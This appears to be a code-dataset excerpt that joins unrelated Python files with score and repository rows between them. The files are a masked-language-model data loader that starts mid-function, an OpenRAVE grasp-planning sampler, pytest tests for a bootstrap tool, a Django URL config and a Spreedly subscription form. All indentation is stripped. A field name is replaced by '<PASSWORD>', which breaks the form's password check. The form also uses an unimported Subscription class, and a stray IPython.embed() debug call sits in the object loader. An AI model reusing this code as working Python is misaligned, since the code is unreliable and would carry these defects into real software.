logger.info('src_entity: ' + ' '.join(
[''.join([self.src_dict[src_item[ii]] if ii < src_sz else '' for ii in range(ent[0], ent[1])]) for ent
in src_entity]))
src_item[masked_pos] = self.replace(src_item[masked_pos])
if self.debug_size_for_mlm < 2:
self.debug_size_for_mlm += 1
logger.info('src_mask: ' + ''.join([self.src_dict[ii] for ii in src_item]))
logger.info('clm_pos: ' + ' '.join([str(v) for v in clm_position_list]))
logger.info('clm_input: ' + ''.join([self.src_dict[ii] for ii in prev_output_tokens]))
logger.info('clm_target: ' + ''.join([self.src_dict[ii] for ii in clm_target]))
logger.info('mlm_pos: ' + ' '.join([str(v) for v in mlm_position_list]))
logger.info(
'mlm_target:' + ''.join([self.src_dict[ii] for ii in mlm_target if ii != self.src_dict.pad_index]))
if prev_output_tokens.numel() == 0:
prev_output_positions, prev_output_tokens, clm_target = self._create_dummy_data('clm')
example = {
'id': index,
'source': src_item,
'cls_target': src_label,
'mlm_target': mlm_target,
'clm_target': clm_target,
'tag_target': torch.from_numpy(np.full(len(src_item), self.cls_pad)),
'prev_output_tokens': prev_output_tokens,
'prev_output_positions': prev_output_positions,
}
return example
def __getitem__(self, index):
"""
src: plain text
meta:
- content: cls_label ent1_start ent1_end ent2_start ent2_end
- desc: cls_label 0 represent no label, it should be skipped in cls task.
TODO:
dynamic_span_length, dynamic_total_length
"""
src_item = self.src[index]
src_meta = self.meta[index]
sep_sz = (src_item == self.src_dict.eos()).sum()
if sep_sz > 1: # ocr data tasks: titlegen segcls, sentcls
if 'titlegen' in self.sub_task and 'segcls' in self.sub_task:
task_selector = random.random()
if task_selector > 0.5:
example = self._get_example_for_title_generation(index, src_item)
else:
example = self._get_example_for_title_generation(index, src_item)
# example = self._get_example_for_boundary_detection(index, src_item) # 这个再确认一下
elif 'segcls' in self.sub_task:
example = self._get_example_for_boundary_detection(index, src_item)
elif 'titlegen' in self.sub_task:
example = self._get_example_for_title_generation(index, src_item)
else:
return
return example
else: # product summary data tasks:
task_selector = random.random()
if task_selector > 0:
# if task_selector < 0:
# if task_selector < 0.4:
return self._get_example_for_mlm(index, src_item, src_meta)
elif task_selector < 0.7:
# elif task_selector < 2:
return self._get_example_for_clm(index, src_item, src_meta)
else:
return self._get_example_for_clm(index, src_item, src_meta)
# return self._get_example_for_cls(index, src_item, src_meta) #
return self._get_example_for_multitask(index, src_item, src_meta)
def collater(self, samples):
return collate(samples, self.src_dict.pad(), self.src_dict.eos())
def replace(self, x):
_x_real = x
_x_rand = _x_real.clone().random_(self.src_dict.nspecial, len(self.src_dict))
_x_mask = _x_real.clone().fill_(self.mask_idx)
probs = torch.multinomial(self.pred_probs, len(x), replacement=True)
_x = _x_mask * (probs == 0).long() + \
_x_real * (probs == 1).long() + \
_x_rand * (probs == 2).long()
return _x
| 1.953125
| 2
|
src/hfts_grasp_planner/core.py
|
malwaru/hfts_grasp_planner
| 3
|
12782911
|
#! /usr/bin/python
import numpy as np
import math
from scipy.spatial import KDTree
import openravepy as orpy
import transformations
from robotiqloader import RobotiqHand, InvalidTriangleException
import sys, time, logging, copy
import itertools
from utils import ObjectFileIO, clamp, compute_grasp_stability, normal_distance, position_distance, dist_in_range
import rospy
import scipy.optimize
class PlanningSceneInterface(object):
def __init__(self, or_env, robot_name):
""" Sets scene information for grasp planning that considers the whole robot.
@param or_env OpenRAVE environment containing the whole planning scene and robot
@param robot_name Name of the robot on which the hand is attached (for ik computations)
"""
self._or_env = or_env
self._robot = or_env.GetRobot(robot_name)
self._manip = self._robot.GetActiveManipulator()
self._arm_ik = orpy.databases.inversekinematics.InverseKinematicsModel(self._robot,
iktype=orpy.IkParameterization.Type.Transform6D)
# Make sure we have an ik solver
if not self._arm_ik.load():
rospy.loginfo('No IKFast solver found. Generating new one...')
self._arm_ik.autogenerate()
self._object = None
def set_target_object(self, obj_name):
self._object = self._or_env.GetKinBody(obj_name)
def check_arm_ik(self, hand_pose_object, grasp_conf, seed, open_hand_offset):
with self._or_env:
# compute target pose in world frame
object_pose = self._object.GetTransform()
hand_pose_scene = np.dot(object_pose, hand_pose_object)
# save current state
dof_values = self._robot.GetDOFValues()
# if we have a seed set it
arm_dofs = self._manip.GetArmIndices()
hand_dofs = self._manip.GetGripperIndices()
if seed is not None:
self._robot.SetDOFValues(seed, dofindices=arm_dofs)
# Compute a pre-grasp hand configuration and set it
pre_grasp_conf = np.asarray(grasp_conf) - open_hand_offset
lower_limits, upper_limits = self._robot.GetDOFLimits(hand_dofs)
pre_grasp_conf = np.asarray(clamp(pre_grasp_conf, lower_limits, upper_limits))
self._robot.SetDOFValues(pre_grasp_conf, dofindices=hand_dofs)
# Now find an ik solution for the target pose with the hand in the pre-grasp configuration
sol = self._manip.FindIKSolution(hand_pose_scene, orpy.IkFilterOptions.CheckEnvCollisions)
# sol = self.seven_dof_ik(hand_pose_scene, orpy.IkFilterOptions.CheckEnvCollisions)
# If that didn't work, try to compute a solution that is in collision (may be useful anyways)
if sol is None:
# sol = self.seven_dof_ik(hand_pose_scene, orpy.IkFilterOptions.IgnoreCustomFilters)
sol = self._manip.FindIKSolution(hand_pose_scene, orpy.IkFilterOptions.IgnoreCustomFilters)
b_sol_col_free = False
else:
b_sol_col_free = True
# Restore original dof values
self._robot.SetDOFValues(dof_values)
return b_sol_col_free, sol, pre_grasp_conf
class HFTSSampler:
def __init__(self, object_io_interface, scene_interface=None, verbose=False, num_hops=2, vis=False):
self._verbose = verbose
self._sampler_viewer = vis
self._orEnv = orpy.Environment() # create openrave environment
self._orEnv.SetDebugLevel(orpy.DebugLevel.Fatal)
self._orEnv.GetCollisionChecker().SetCollisionOptions(orpy.CollisionOptions.Contacts)
if vis:
self._orEnv.SetViewer('qtcoin') # attach viewer (optional)
self._or_handles = []
else:
self._or_handles = None
self._scene_or_env = None
self._hand_loaded = False
self._scene_interface = scene_interface
self._obj_loaded = False
self._max_iters = 40
self._reachability_weight = 1.0
self._mu = 2.0
self._min_stability = 0.0
self._b_force_new_hfts = False
self._object_kd_tree = None
self._object_points = None
# self._hops = num_hops
# TODO remove this aga
self._hops = 2
self._robot = None
self._obj = None
self._obj_com = None
self._data_labeled = None
self._hand_manifold = None
self._num_contacts = None
self._contact_combinations = []
self._num_levels = 0
self._branching_factors = []
self._object_io_interface = object_io_interface
def __del__(self):
orpy.RaveDestroy()
def check_arm_grasp_validity(self, grasp_conf, grasp_pose, seed, open_hand_offset=0.1):
if self._scene_interface is None:
#TODO Think about what we should do in this case (planning with free-floating hand)
return True, None, None
object_hfts_pose = self._obj.GetTransform() # pose in environment used for contact planning
hand_pose_object_frame = np.dot(np.linalg.inv(object_hfts_pose), grasp_pose)
# hand_pose_world = np.dot(object_hfts_pose, grasp_pose)
collision_free, arm_conf, pre_grasp_conf = \
self._scene_interface.check_arm_ik(hand_pose_object_frame,
grasp_conf,
seed=seed,
open_hand_offset=open_hand_offset)
return collision_free, arm_conf, pre_grasp_conf
def check_grasp_validity(self):
# Check whether the hand is collision free
if self._robot.CheckSelfCollision():
return False
real_contacts = self.get_real_contacts()
# self.draw_contacts(real_contacts)
stability = compute_grasp_stability(grasp_contacts=real_contacts,
mu=self._mu)
return stability > self._min_stability and self.is_grasp_collision_free()
def create_object_kd_tree(self, points):
self._object_kd_tree = KDTree(points[:, :3])
self._object_points = points
def compute_allowed_contact_combinations(self, depth, label_cache):
# Now, for this parent get all possible contacts
allowed_finger_combos = set(self._contact_combinations[depth])
# Next, we want to filter out contact combinations that are stored in labelCache
forbidden_finger_combos = set()
for grasp_label in label_cache:
finger_combo = tuple([x[-1] for x in grasp_label])
forbidden_finger_combos.add(finger_combo)
# Filter them out
allowed_finger_combos.difference_update(forbidden_finger_combos)
return list(allowed_finger_combos)
def compute_contact_combinations(self):
while len(self._contact_combinations) < self._num_levels:
self._contact_combinations.append([])
for i in range(self._num_levels):
self._contact_combinations[i] = set(itertools.product(range(self._branching_factors[i]),
repeat=self._num_contacts))
def compose_grasp_info(self, contact_labels):
contacts = [] # a list of contact positions and normals
for i in range(self._num_contacts):
p, n = self.get_cluster_repr(contact_labels[i])
contacts.append(list(p) + list(n))
object_contacts = np.asarray(contacts)
code_tmp = self._hand_manifold.encode_grasp(object_contacts)
dummy, grasp_conf = self._hand_manifold.predict_hand_conf(code_tmp)
hand_contacts = self._robot.get_ori_tip_pn(grasp_conf)
return grasp_conf, object_contacts, hand_contacts
def _debug_visualize_quality(self, labels, quality, handles):
grasp_conf, object_contacts, hand_contacts = self.compose_grasp_info(labels)
self._robot.SetVisible(False)
handles.append(self._draw_contacts_quality(object_contacts, quality))
def _draw_contacts_quality(self, object_contacts, quality):
colors = [[1, 0, 0, 1], [0, 1, 0, 1], [0, 0, 1, 1]]
quality = min(abs(quality), 0.005)
width = 0.003
length = max((1.0 - abs(quality) / 0.005) * 0.05, 0.001)
# Draw planned contacts
arrow_handles = []
for i in range(object_contacts.shape[0]):
arrow_handles.append(self._orEnv.drawarrow(object_contacts[i, :3],
object_contacts[i, :3] - length * object_contacts[i, 3:],
width, colors[i]))
return arrow_handles
def _debug_visualize(self, labels, handle_index=-1):
grasp_conf, object_contacts, hand_contacts = self.compose_grasp_info(labels)
rospy.logwarn('Debug visualize')
# self._robot.SetVisible(False)
# self.draw_contacts(object_contacts, handle_index=handle_index)
# time.sleep(1.0)
# self._robot.SetVisible(True)
def draw_contacts(self, object_contacts, handle_index=-1):
if len(self._or_handles) == 0:
self._or_handles.append(None)
self._or_handles.append(None)
# TODO this is hard coded for three contacts
colors = [[1, 0, 0, 1], [0, 1, 0, 1], [0, 0, 1, 1]]
if handle_index != 0:
width = 0.003
length = 0.05
else:
width = 0.001
length = 0.1
# Draw planned contacts
arrow_handles = []
for i in range(object_contacts.shape[0]):
arrow_handles.append(self._orEnv.drawarrow(object_contacts[i, :3],
object_contacts[i, :3] - length * object_contacts[i, 3:],
width, colors[i]))
self._or_handles[handle_index] = arrow_handles
def evaluate_grasp(self, contact_label):
contacts = [] # a list of contact positions and normals
for i in range(self._num_contacts):
p, n = self.get_cluster_repr(contact_label[i])
contacts.append(list(p) + list(n))
contacts = np.asarray(contacts)
# self.draw_contacts(contacts)
s_tmp = self._hand_manifold.compute_grasp_quality(self._obj_com, contacts)
code_tmp = self._hand_manifold.encode_grasp(contacts)
r_tmp, dummy = self._hand_manifold.predict_hand_conf(code_tmp)
# TODO: Research topic. This is kind of hack. Another objective function might be better
# o_tmp = s_tmp / (r_tmp + 0.000001)
o_tmp = s_tmp - self._reachability_weight * r_tmp
assert not math.isnan(o_tmp) and not math.isinf(math.fabs(o_tmp))
# o_tmp = s_tmp / (r_tmp + 1.0)
# return s_tmp, r_tmp, o_tmp
return s_tmp, r_tmp, -r_tmp
def extend_hfts_node(self, old_labels, allowed_finger_combos=None):
new_depth = len(old_labels[0]) # a label has length depth + 1
if allowed_finger_combos is not None:
fingertip_assignments = np.random.choice(allowed_finger_combos)
else:
fingertip_assignments = np.random.choice(self._branching_factors[new_depth],
self._num_contacts,
replace=True)
for label, assignment in itertools.izip(old_labels, fingertip_assignments):
label.append(assignment)
s_tmp, r_tmp, o_tmp = self.evaluate_grasp(old_labels)
# self._debug_visualize(old_labels, 0)
return o_tmp, old_labels
def get_branch_information(self, level):
if level < self.get_maximum_depth():
possible_num_children = pow(self._branching_factors[level] + 1, self._num_contacts)
possible_num_leaves = 1
for d in range(level, self.get_maximum_depth()):
possible_num_leaves *= pow(self._branching_factors[level] + 1, self._num_contacts)
else:
possible_num_children = 0
possible_num_leaves = 1
return possible_num_children, possible_num_leaves
def get_cluster_repr(self, label):
level = len(label) - 1 # indexed from 0
idx = np.where((self._data_labeled[:, 6:7 + level] == label).all(axis=1))
points = [self._data_labeled[t, 0:3] for t in idx][0]
normals = [self._data_labeled[t, 3:6] for t in idx][0]
pos = np.sum(points, axis=0) / len(idx[0])
normal = np.sum(normals, axis=0) / len(idx[0])
normal /= np.linalg.norm(normal)
return pos, -normal
def get_maximum_depth(self):
return self._num_levels
def get_or_hand(self):
return self._robot
def get_random_sibling_label(self, label):
ret = []
if len(label) <= self._hops / 2:
for i in range(len(label)):
ret.append(np.random.randint(self._branching_factors[i]))
else:
match_len = len(label) - self._hops / 2
ret = label[:match_len]
for i in range(len(label) - match_len):
ret.append(np.random.randint(self._branching_factors[i + match_len]))
return ret
def get_random_sibling_labels(self, curr_labels, allowed_finger_combos=None):
labels_tmp = []
if allowed_finger_combos is None:
for i in range(self._num_contacts):
tmp = self.get_random_sibling_label(curr_labels[i])
labels_tmp.append(tmp)
else:
finger_combo = np.random.choice(allowed_finger_combos)
for i in range(self._num_contacts):
tmp = list(curr_labels[i])
tmp[-1] = finger_combo[i]
labels_tmp.append(tmp)
return labels_tmp
def get_real_contacts(self):
collision_report = orpy.CollisionReport()
real_contacts = []
# iterate over all fingertip links and determine the contacts
for eel in self._robot.get_fingertip_links():
link = self._robot.GetLink(eel)
self._orEnv.CheckCollision(self._obj, link, report=collision_report)
# self._orEnv.CheckCollision(link, self._obj, report=collision_report)
if len(collision_report.contacts) == 0:
raise ValueError('[HFTSSampler::get_real_contacts] No contacts found')
# TODO the normals reported by the collision check are wrong, so instead we use a nearest
# TODO neighbor lookup. Should see what's wrong with OpenRAVE here...
position = collision_report.contacts[0].pos
normal = self._object_points[self._object_kd_tree.query(position), 3:][1]
# normal = collision_report.contacts[0].norm
real_contacts.append(np.concatenate((position, normal)))
real_contacts = np.asarray(real_contacts)
return real_contacts
def get_root_node(self):
possible_num_children, possible_num_leaves = self.get_branch_information(0)
return HFTSNode(num_possible_children=possible_num_children,
num_possible_leaves=possible_num_leaves)
def is_grasp_collision_free(self):
links = self._robot.get_non_fingertip_links()
for link in links:
if self._orEnv.CheckCollision(self._robot.GetLink(link)):
return False
return True
def load_hand(self, hand_file, hand_cache_file):
if not self._hand_loaded:
# TODO make this Robotiq hand independent (external hand loader)
self._robot = RobotiqHand(hand_cache_file=hand_cache_file,
env=self._orEnv, hand_file=hand_file)
self._hand_manifold = self._robot.get_hand_manifold()
self._hand_manifold.load()
self._num_contacts = self._robot.get_contact_number()
shift = transformations.identity_matrix()
shift[0, -1] = 0.2
self._robot.SetTransform(shift)
rospy.loginfo('Hand loaded in OpenRAVE environment')
self._hand_loaded = True
def load_object(self, obj_id, model_id=None):
if model_id is None:
model_id = obj_id
self._data_labeled, self._branching_factors, self._obj_com = \
self._object_io_interface.get_hfts(model_id, self._b_force_new_hfts)
if self._data_labeled is None:
raise RuntimeError('Could not load HFTS model for model ' + model_id)
self.create_object_kd_tree(self._data_labeled[:, :6])
self._num_levels = len(self._branching_factors)
# First, delete old object if there is any
if self._obj_loaded:
self._orEnv.Remove(self._obj)
or_file_name = self._object_io_interface.get_openrave_file_name(model_id)
self._obj_loaded = self._orEnv.Load(or_file_name)
if not self._obj_loaded:
raise RuntimeError('Could not load object model %s in OpenRAVE' % model_id)
self._obj = self._orEnv.GetKinBody('objectModel')
rospy.loginfo('Object loaded in OpenRAVE environment')
if self._scene_interface is not None:
self._scene_interface.set_target_object(obj_id)
self.compute_contact_combinations()
self._obj_loaded = True
import IPython
IPython.embed()
def sample_grasp(self, node, depth_limit, post_opt=False, label_cache=None, open_hand_offset=0.1):
if depth_limit < 0:
raise ValueError('HFTSSampler::sample_grasp depth limit must be greater or equal to zero.')
if node.get_depth() >= self._num_levels:
raise ValueError('HFTSSampler::sample_grasp input node has an invalid depth')
if node.get_depth() + depth_limit >= self._num_levels:
depth_limit = self._num_levels - node.get_depth() # cap
# In case we using the integrated method, we might have a limitation on what nodes to descend to
# let's compute this set.
allowed_finger_combos = None
if label_cache is not None and depth_limit == 1:
# TODO This currently only works for hops == 2
assert self._hops == 2
allowed_finger_combos = self.compute_allowed_contact_combinations(node.get_depth(), label_cache)
rospy.logdebug('[HFTSSampler::sample_grasp] We have %i allowed contacts' % len(allowed_finger_combos))
if len(allowed_finger_combos) == 0:
rospy.logwarn('[HFTSSampler::sample_grasp] We have no allowed contacts left! Aborting.')
return node
elif label_cache is not None and depth_limit != 1:
raise ValueError('[HFTSSampler::sample_grasp] Label cache only works for depth_limit == 1')
# Now, get a node to start stochastic optimization from
seed_ik = None
if node.get_depth() == 0: # at root
contact_label = self.pick_new_start_node()
best_o = -np.inf # need to also consider non-root nodes
else:
# If we are not at a leaf node, go down in the hierarchy
seed_ik = node.get_arm_configuration()
contact_label = copy.deepcopy(node.get_labels())
best_o, contact_label = self.extend_hfts_node(contact_label,
allowed_finger_combos=allowed_finger_combos)
self.reset_robot()
depth_limit -= 1
rospy.logdebug('[HFTSSampler::sample_grasp] Sampling a grasp; %i number of iterations' % self._max_iters)
# Do stochastic optimization until depth_limit is reached
while depth_limit >= 0:
# Randomly select siblings to optimize the objective function
for iter_now in range(self._max_iters):
labels_tmp = self.get_random_sibling_labels(curr_labels=contact_label,
allowed_finger_combos=allowed_finger_combos)
s_tmp, r_tmp, o_tmp = self.evaluate_grasp(labels_tmp)
if self.shc_evaluation(o_tmp, best_o):
contact_label = labels_tmp
best_o = o_tmp
# self._debug_visualize(labels_tmp, handle_index=0)
# Descend to next level if we iterate at least once more
if depth_limit > 0:
best_o, contact_label = self.extend_hfts_node(contact_label)
depth_limit -= 1
# Evaluate grasp on robot hand
# First, determine a hand configuration and the contact locations
grasp_conf, object_contacts, hand_contacts = self.compose_grasp_info(contact_label)
# Simulate the grasp and do local adjustments
b_robotiq_ok, grasp_conf, grasp_pose = self.simulate_grasp(grasp_conf=grasp_conf,
hand_contacts=hand_contacts,
object_contacts=object_contacts,
post_opt=post_opt,
swap_contacts=label_cache is None)
if b_robotiq_ok:
sample_q = 0
stability = best_o
else:
sample_q = 4
stability = 0.0
# except InvalidTriangleException:
# grasp_conf = None
# sample_q = 4
# stability = 0.0
is_leaf = (len(contact_label[0]) == self._num_levels)
is_goal_sample = (sample_q == 0) and is_leaf
if not is_goal_sample and grasp_conf is not None:
rospy.logdebug('[HFTSSampler::sample_grasp] Approximate has final quality: %i' % sample_q)
b_approximate_feasible = self._robot.avoid_collision_at_fingers(n_step=20)
if b_approximate_feasible:
grasp_conf = self._robot.GetDOFValues()
open_hand_offset = 0.0
logging.debug('[HFTSSampler::sample_grasp] We sampled a grasp on level ' + str(len(contact_label[0])))
if is_goal_sample:
logging.debug('[HFTSSampler::sample_grasp] We sampled a goal grasp (might be in collision)!')
if is_leaf:
logging.debug('[HFTSSampler::sample_grasp] We sampled a leaf')
if grasp_conf is not None and grasp_pose is not None:
collision_free_arm_ik, arm_conf, pre_grasp_conf = \
self.check_arm_grasp_validity(grasp_conf=grasp_conf,
grasp_pose=grasp_pose,
seed=seed_ik, open_hand_offset=open_hand_offset)
else:
collision_free_arm_ik = False
arm_conf = None
pre_grasp_conf = None
depth = len(contact_label[0])
possible_num_children, possible_num_leaves = self.get_branch_information(depth)
return HFTSNode(labels=contact_label, hand_conf=np.asarray(grasp_conf),
pre_grasp_conf=pre_grasp_conf, arm_conf=arm_conf,
is_goal=is_goal_sample, is_leaf=is_leaf, is_valid=collision_free_arm_ik,
num_possible_children=possible_num_children, num_possible_leaves=possible_num_leaves,
hand_transform=self._robot.GetTransform())
def set_max_iter(self, m):
assert m > 0
self._max_iters = m
def set_parameters(self, max_iters=None, reachability_weight=None,
com_center_weight=None, hfts_generation_params=None,
b_force_new_hfts=None):
# TODO some of these parameters are Robotiq hand specific. We probably wanna pass them as dictionary
if max_iters is not None:
self._max_iters = max_iters
assert self._max_iters > 0
if reachability_weight is not None:
self._reachability_weight = reachability_weight
assert self._reachability_weight >= 0.0
# TODO this is Robotiq hand specific, and outdated
self._hand_manifold.set_parameters(com_center_weight)
if hfts_generation_params is not None:
self._object_io_interface.set_hfts_generation_parameters(hfts_generation_params)
if b_force_new_hfts is not None:
self._b_force_new_hfts = b_force_new_hfts
def shc_evaluation(self, o_tmp, best_o):
if best_o < o_tmp:
return True
else:
return False
def _simulate_grasp(self, grasp_conf, hand_contacts, object_contacts, post_opt=False):
# self.draw_contacts(object_contacts)
self._robot.SetDOFValues(grasp_conf)
try:
T = self._robot.hand_obj_transform(hand_contacts[:3, :3], object_contacts[:, :3])
self._robot.SetTransform(T)
except InvalidTriangleException as ite:
logging.warn('[HFTSSampler::simulate_grasp] Caught an InvalidTriangleException: ' + str(ite))
return False, grasp_conf, None
if post_opt:
self._post_optimization(object_contacts)
open_success, tips_in_contact = self._robot.comply_fingertips()
if not open_success or not tips_in_contact:
return False, self._robot.GetDOFValues(), self._robot.GetTransform()
if self.check_grasp_validity():
return True, self._robot.GetDOFValues(), self._robot.GetTransform()
return False, self._robot.GetDOFValues(), self._robot.GetTransform()
def simulate_grasp(self, grasp_conf, hand_contacts, object_contacts, post_opt=False, swap_contacts=True):
# TODO this method as it is right now is only useful for the Robotiq hand.
b_grasp_valid, grasp_conf, grasp_pose = self._simulate_grasp(grasp_conf, hand_contacts, object_contacts, post_opt)
if not b_grasp_valid and swap_contacts:
self.swap_contacts([0, 1], object_contacts)
b_grasp_valid, grasp_conf, grasp_pose = self._simulate_grasp(grasp_conf, hand_contacts, object_contacts, post_opt)
return b_grasp_valid, grasp_conf, grasp_pose
@staticmethod
def swap_contacts(rows, object_contacts):
frm = rows[0]
to = rows[1]
object_contacts[[frm, to], :] = object_contacts[[to, frm], :]
def reset_robot(self):
shift = transformations.identity_matrix()
shift[0, -1] = 0.2
self._robot.SetTransform(shift)
# Set hand to default (mean) configuration
mean_values = map(lambda min_v, max_v: (min_v + max_v) / 2.0,
self._robot.GetDOFLimits()[0],
self._robot.GetDOFLimits()[1])
self._robot.SetDOFValues(mean_values, range(len(mean_values)))
def pick_new_start_node(self):
num_nodes_top_level = self._branching_factors[0]
contact_label = []
for i in range(self._num_contacts):
contact_label.append([np.random.choice(range(num_nodes_top_level + 1))])
return contact_label
def plot_clusters(self, contact_labels):
if not self._sampler_viewer:
return
self.cloud_plot = []
colors = [np.array((1,0,0)), np.array((0,1,0)), np.array((0,0,1))]
for i in range(3):
label = contact_labels[i]
level = len(label) - 1 # indexed from 0
idx = np.where((self._data_labeled[:, 6:7 + level] == label).all(axis=1))
points = [self._data_labeled[t, 0:3] for t in idx][0]
points = np.asarray(points)
self.cloud_plot.append(self._orEnv.plot3(points=points, pointsize=0.006, colors=colors[i], drawstyle=1))
def _post_optimization(self, grasp_contacts):
logging.info('[HFTSSampler::_post_optimization] Performing post optimization.')
transform = self._robot.GetTransform()
angle, axis, point = transformations.rotation_from_matrix(transform)
# further optimize hand configuration and pose
# TODO this is Robotiq hand specific
transform_params = axis.tolist() + [angle] + transform[:3, 3].tolist()
robot_dofs = self._robot.GetDOFValues().tolist()
def joint_limits_constraint(x, *args):
positions, normals, robot = args
lower_limits, upper_limits = robot.GetDOFLimits()
return -dist_in_range(x[0], [lower_limits[0], upper_limits[0]]) - \
dist_in_range(x[1], [lower_limits[1], upper_limits[1]])
def collision_free_constraint(x, *args):
positions, normals, robot = args
config = [x[0], x[1]]
robot.SetDOFValues(config)
env = robot.GetEnv()
links = robot.get_non_fingertip_links()
for link in links:
if env.CheckCollision(robot.GetLink(link)):
return -1.0
return 0.0
x_min = scipy.optimize.fmin_cobyla(self._post_optimization_obj_fn, robot_dofs + transform_params,
[joint_limits_constraint, collision_free_constraint],
rhobeg=.5, rhoend=1e-3,
args=(grasp_contacts[:, :3], grasp_contacts[:, 3:], self._robot),
maxfun=int(1e8), iprint=0)
self._robot.SetDOFValues(x_min[:2])
axis = x_min[2:5]
angle = x_min[5]
position = x_min[6:]
transform = transformations.rotation_matrix(angle, axis)
transform[:3, 3] = position
self._robot.SetTransform(transform)
@staticmethod
def _post_optimization_obj_fn(x, *params):
# TODO this is Robotiq hand specific
desired_contact_points, desired_contact_normals, robot = params
dofs = x[:2]
robot.SetDOFValues(dofs)
axis = x[2:5]
angle = x[5]
position = x[6:]
transform = transformations.rotation_matrix(angle, axis)
transform[:3, 3] = position
robot.SetTransform(transform)
contacts = robot.get_tip_pn()
temp_positions = contacts[:, :3]
temp_normals = contacts[:, 3:]
pos_err = position_distance(desired_contact_points, temp_positions)
normal_err = normal_distance(desired_contact_normals, temp_normals)
return pos_err + normal_err
class HFTSNode:
def __init__(self, labels=None, hand_conf=None, hand_transform=None,
pre_grasp_conf=None, arm_conf=None, is_leaf=False, is_valid=False, is_goal=False,
num_possible_children=0, num_possible_leaves=0, quality=0.0):
# None values represent the root node
if labels is None:
self._depth = 0
else:
self._depth = len(labels[0])
self._labels = labels
self._hand_config = hand_conf
self._hand_transform = hand_transform
self._is_goal = is_goal
self._is_leaf = is_leaf
self._is_valid = is_valid
self._pre_grasp_conf = pre_grasp_conf
self._arm_conf = arm_conf
self._num_possible_children = num_possible_children
self._num_possible_leaves = num_possible_leaves
self._quality = quality
def get_labels(self):
return self._labels
def get_depth(self):
return self._depth
def get_hand_config(self):
return self._hand_config
def get_pre_grasp_config(self):
return self._pre_grasp_conf
def is_goal(self):
return self._is_goal
def get_hand_transform(self):
return self._hand_transform
def get_arm_configuration(self):
return self._arm_conf
def get_unique_label(self):
if self._labels is None:
return 'root'
label = []
for finger_label in self._labels:
label.extend(finger_label)
return str(label)
def is_extendible(self):
return not self._is_leaf
def is_leaf(self):
return self._is_leaf
def is_valid(self):
return self._is_valid
def get_num_possible_children(self):
return self._num_possible_children
def get_num_possible_leaves(self):
return self._num_possible_leaves
def get_quality(self):
return self._quality
| 2.09375
| 2
|
tests/test_bootstrap.py
|
initOS/dob-lib
| 0
|
12782912
|
# © 2021 <NAME> (initOS GmbH)
# License Apache-2.0 (http://www.apache.org/licenses/).
import os
from queue import Empty
from unittest import mock
import pytest
from doblib.bootstrap import BootstrapEnvironment, aggregate_repo
def aggregate_exception(repo, args, sem, err_queue):
try:
err_queue.put_nowait("ERROR")
finally:
sem.release()
@pytest.fixture
def env():
cur = os.getcwd()
os.chdir("tests/environment/")
env = BootstrapEnvironment("odoo.local.yaml")
os.chdir(cur)
return env
def test_init(env):
env.generate_config = mock.MagicMock()
env._bootstrap = mock.MagicMock()
env.init(["--no-config"])
env.generate_config.assert_not_called()
env._bootstrap.assert_called_once()
env._bootstrap.reset_mock()
env.init()
env.generate_config.assert_called_once()
env._bootstrap.assert_called_once()
@mock.patch("doblib.bootstrap.match_dir", return_value=False)
def test_aggregate_repo(match_mock):
m = mock.MagicMock()
aggregate_repo(m, m, m, m)
m.put_nowait.assert_not_called()
m.release.assert_called_once()
match_mock.assert_called_once_with(m.cwd, m.dirmatch)
m.aggregate.assert_not_called()
m.reset_mock()
match_mock.return_value = True
aggregate_repo(m, m, m, m)
m.put_nowait.assert_not_called()
m.release.assert_called_once()
m.aggregate.assert_called()
m.reset_mock()
match_mock.side_effect = Exception()
aggregate_repo(m, m, m, m)
m.put_nowait.assert_called()
m.release.assert_called_once()
m.aggregate.assert_not_called()
@mock.patch("doblib.bootstrap.traceback")
@mock.patch("doblib.bootstrap.Repo")
@mock.patch("doblib.bootstrap.aggregate_repo")
@mock.patch("doblib.bootstrap.get_repos", return_value=[{"cwd": "unknown"}])
def test_bootstrap(repos, aggregate, repo, traceback, env):
env.generate_config = mock.MagicMock()
assert not env.init()
repos.assert_called_once()
repo.assert_called()
aggregate.assert_called()
aggregate.reset_mock()
env.init(["-j", "1"])
aggregate.assert_called()
with mock.patch("doblib.bootstrap.Queue") as m:
queue = m.return_value
queue.empty.return_value = False
queue.get_nowait.side_effect = [(1, 42, 37), Empty()]
assert env.init() == 1
queue.empty.assert_called()
queue.get_nowait.assert_called()
traceback.print_exception.assert_called_once_with(1, 42, 37)
| 2.125
| 2
|
api/urls.py
|
horbenko/web
| 0
|
12782913
|
from django.conf.urls import url
from django.http import HttpResponseRedirect
from .views import PostCreate, PostUpdate, PostDelete, ProfileView
app_name = 'api'
urlpatterns = [
url(r'^$', lambda r: HttpResponseRedirect('new/'), name='index'),
url(r'^(?P<pk>[0-9]+)/$', PostUpdate.as_view(), name='update'),
url(r'^new/$', PostCreate.as_view(), name='create'),
url(r'^(?P<pk>[0-9]+)/delete/$', PostDelete.as_view(), name='delete'),
# API
url(r'^profile/$', ProfileView.as_view(), name='profile'),
]
| 1.796875
| 2
|
spreedly/forms.py
|
guitarparty/django-spreedly
| 2
|
12782914
|
import uuid
from django import forms
from django.conf import settings
from django.core.mail import send_mail
from django.contrib.auth.models import User
from django.contrib.sites.models import Site
from django.core.urlresolvers import reverse
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _
from spreedly.models import Plan, Gift
from spreedly.functions import subscription_url, check_trial_eligibility, return_url
import spreedly.settings as spreedly_settings
from spreedly.pyspreedly.api import Client
class SubscribeForm(forms.Form):
username = forms.CharField(
max_length=30,
required=True
)
email = forms.EmailField(
required=True
)
password1 = forms.CharField(
label="Password",
required=True,
widget=forms.PasswordInput(),
)
password2 = forms.CharField(
label="Password again",
required=True,
widget=forms.PasswordInput(),
)
subscription = forms.ModelChoiceField(queryset=Plan.objects.filter(enabled=True), empty_label=None)
def clean(self):
username = self.cleaned_data.get("username")
email = self.cleaned_data.get("email")
pass1 = self.cleaned_data.get("password1")
pass2 = self.cleaned_data.get("<PASSWORD>")
plan = self.cleaned_data.get("subscription")
if username and email and pass1 and pass2:
if pass1 != pass2:
raise forms.ValidationError(_("You must type the same password each time."))
if plan.is_free_trial_plan:
existing_users = Subscription.objects.filter(user__email=email, trial_elegible=False).count()
if existing_users:
raise forms.ValidationError(_("A user with this email has already had a free trial."))
user, created = User.objects.get_or_create(username=username.lower(), defaults={
'email': email,
'is_active': False
})
if not created and user.is_active:
raise forms.ValidationError(_("Sorry, This username is already taken."))
elif not created:
user.email = email
user.save()
return self.cleaned_data
def save(self):
user = User.objects.get(username=self.cleaned_data["username"].lower())
user.set_password(self.cleaned_data["password2"])
user.save()
